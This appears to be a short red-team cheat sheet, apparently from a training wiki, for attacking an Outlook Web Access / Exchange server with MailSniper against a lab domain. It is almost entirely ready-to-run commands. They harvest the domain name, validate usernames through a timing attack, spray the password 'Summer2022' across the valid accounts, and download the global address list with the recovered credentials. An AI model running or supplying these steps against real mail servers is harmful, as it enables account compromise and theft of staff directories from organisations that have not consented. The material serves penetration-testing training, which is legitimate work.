OWA: MailSniper

Attacking Office 365 / Echange mailserver

Import module

ipmo C:\Tools\MailSniper\MailSniper.ps1

Enumerate NetBIOS name of target domain

Invoke-DomainHarvestOWA -ExchHostname mail.cyberbotic.io

Username list mutation

~/namemash.py names.txt > possible.txt

Username validation (timing attack)

Invoke-UsernameHarvestOWA -ExchHostname mail.cyberbotic.io -Domain cyberbotic.io -UserList .\Desktop\possible.txt -OutFile .\Desktop\valid.txt

Spray passwords against identified usernames

Invoke-PasswordSprayOWA -ExchHostname mail.cyberbotic.io -UserList .\Desktop\valid.txt -Password Summer2022

Download global address list

Get-GlobalAddressList -ExchHostname mail.cyberbotic.io -UserName cyberbotic.io\iyates -Password Summer2022 -OutFile .\Desktop\gal.txt

Last updated 2 years ago